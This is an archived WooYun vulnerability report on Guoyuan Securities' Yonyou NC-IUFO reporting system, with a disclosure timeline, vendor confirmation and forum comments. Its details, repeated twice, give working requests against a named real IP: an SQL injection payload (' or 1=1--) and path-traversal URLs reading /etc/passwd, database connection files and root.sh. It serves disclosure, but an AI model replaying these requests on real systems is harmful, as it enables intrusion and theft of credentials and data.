当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192620

漏洞标题:国元证券某处SQL注入任意文件读取/下载/数据库信息泄露等安全漏洞

相关厂商:国元证券

漏洞作者: 黑色键盘丶

提交时间:2016-04-05 11:15

修复时间:2016-05-23 09:40

公开时间:2016-05-23 09:40

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-08: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 细节向公众公开

简要描述:

RT

详细说明:

以为不是国元 看了这个ip https://60.173.222.35/才知道哦

案例 WooYun: 用友NC-IUFO报表系统部分安全问题(影响多个大客户) 


后台:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction


用户信息泄露:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=


1.jpg


SQL注入:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute
data:TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1--


2.png


3.png


任意文件读取:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../../../etc/passwd


4.jpg


数据量链接信息:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml


4.png


http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../conf/server.xml


4.png


任意文件下载也是一样罗http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../root.sh


11.png


漏洞证明:

案例 WooYun: 用友NC-IUFO报表系统部分安全问题(影响多个大客户) 


后台:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction


用户信息泄露:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=


1.jpg


SQL注入:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute
data:TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1--


2.png


3.png


任意文件读取:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../../../etc/passwd


4.jpg


数据量链接信息:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml


4.png


http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../conf/server.xml


4.png


任意文件下载也是一样罗http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../root.sh


11.png


修复方案:

你懂的额

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-08 09:34

厂商回复:

非常感谢您对国元证券的关注和支持,我们将尽快对漏洞进行修复和处理!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-05 11:25 | king7 ( 普通白帽子 | Rank:1857 漏洞数:248 | 3P is the life I want to live.)

    表哥

  2. 2016-04-05 11:31 | 黑色键盘丶 ( 普通白帽子 | Rank:1519 漏洞数:310 | 哥,是孤独风中的一匹狼)

    @king7 嗨 大表哥

  3. 2016-04-05 11:35 | 泪雨无魂 ( 普通白帽子 | Rank:303 漏洞数:70 | too young too simple)

    表哥们好

  4. 2016-04-05 11:44 | 奶嘴 ( 普通白帽子 | Rank:385 漏洞数:98 | 17岁的毛孩有些厂商故意加你好友,和你聊...)

    GG